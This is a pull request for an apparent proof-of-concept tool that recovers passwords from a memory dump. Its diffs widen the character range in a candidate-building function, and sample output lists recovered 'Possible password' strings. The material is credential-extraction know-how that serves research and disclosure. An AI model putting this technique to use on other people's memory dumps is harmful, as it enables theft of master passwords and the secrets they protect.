### PR TITLE
fix special characters

### DIFF
--- a/poc.py
+++ b/poc.py
@@ -59,7 +59,7 @@ def get_candidates(dump_file):
             str_len += 1
             i += 1
         elif str_len > 0:
-            if (data[i] >= 0x20) and (data[i] <= 0x7E) and (data[i + 1] == 0x00):
+            if (data[i] >= 0x20) and (data[i] <= 0xFF) and (data[i + 1] == 0x00):
                 candidate = (str_len * b'\xCF\x25') + bytes([data[i], data[i + 1]])
 
                 if not candidate in candidates:

--- a/poc.py
+++ b/poc.py
@@ -59,7 +59,7 @@ def get_candidates(dump_file):
             str_len += 1
             i += 1
         elif str_len > 0:
-            if (data[i] >= 0x20) and (data[i] <= 0xFF) and (data[i + 1] == 0x00):
+            if (((data[i] >= 0x20) and (data[i] <= 0x7E)) or data[i] >= 0xA0) and (data[i + 1] == 0x00):
                 candidate = (str_len * b'\xCF\x25') + bytes([data[i], data[i + 1]])
 
                 if not candidate in candidates:


### PR DESCRIPTION
This should fix the open issue #1, as now the result looks as following:
```bash
Possible password: ●ødgrød med fløde
Possible password: ●Ïdgrød med fløde
Possible password: ●,dgrød med fløde
Possible password: ●ldgrød med fløde
Possible password: ●`dgrød med fløde
Possible password: ●-dgrød med fløde
Possible password: ●'dgrød med fløde
Possible password: ●]dgrød med fløde
Possible password: ●§dgrød med fløde
Possible password: ●Adgrød med fløde
Possible password: ●Idgrød med fløde
Possible password: ●:dgrød med fløde
Possible password: ●=dgrød med fløde
Possible password: ●_dgrød med fløde
Possible password: ●cdgrød med fløde
Possible password: ●Mdgrød med fløde
```